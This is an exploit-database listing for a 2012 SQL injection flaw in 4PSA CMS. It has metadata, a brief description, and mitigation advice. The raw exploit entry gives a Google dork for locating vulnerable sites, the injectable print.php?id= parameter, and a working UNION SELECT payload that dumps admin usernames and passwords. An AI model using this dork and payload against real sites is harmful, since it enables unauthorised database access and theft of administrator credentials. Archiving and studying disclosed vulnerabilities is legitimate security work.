header-logo
Suggest Exploit
vendor:
CMS
by:
#BHG Security Center
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CMS
Affected Version From: Last Version
Affected Version To: Last Version
Patch Exists: N/A
Related CWE: N/A
CPE: 4psa.com
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: GNU/Linux, Windows
2012

4PSA CMS SQL Injection Vulnerabilities

An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. By exploiting this vulnerability, an attacker can gain access to the database and can view, modify, or delete the data stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

#################################################################################
# Exploit Title: 4PSA CMS SQL Injection Vulnerabilities
# Google Dork: "Communications solution from 4PSA."
# Date: 2012/02/19
# Category : [Web Application]
# Author: #BHG Security Center
# Discovered by : Nitrojen90
# WebSite:WwW.Black-hg.Org
# Software Link: http://www.4psa.com/
# Version: Last Version
# Security Risk::High
# Tested on: GNU/Linux - Windows
#################################################################################
# p0c :
#
# http://target.com/print.php?id=[SQL]
#
# write the code in front of the print.php?id= and enter for show all admin
#
# user & Pass.
#
# Eval Code : NULL UNION+SelEct+group_concat(uname,0x3a,pwd),2+FROM user--
#
#################################################################################

#################################################################################
# Special Thanks To : Net.Edit0r - 3H34N - A.Cr0x - 4M!N - ArYaIeIrAN -
G3n3rall
# Mr.XHat - Bl4ck.Viper - Dj.TiniVini
#################################################################################
# GreetZ : All Active Member in #BHG Security Center & md.r00t - hellboy -
fr0nk
#################################################################################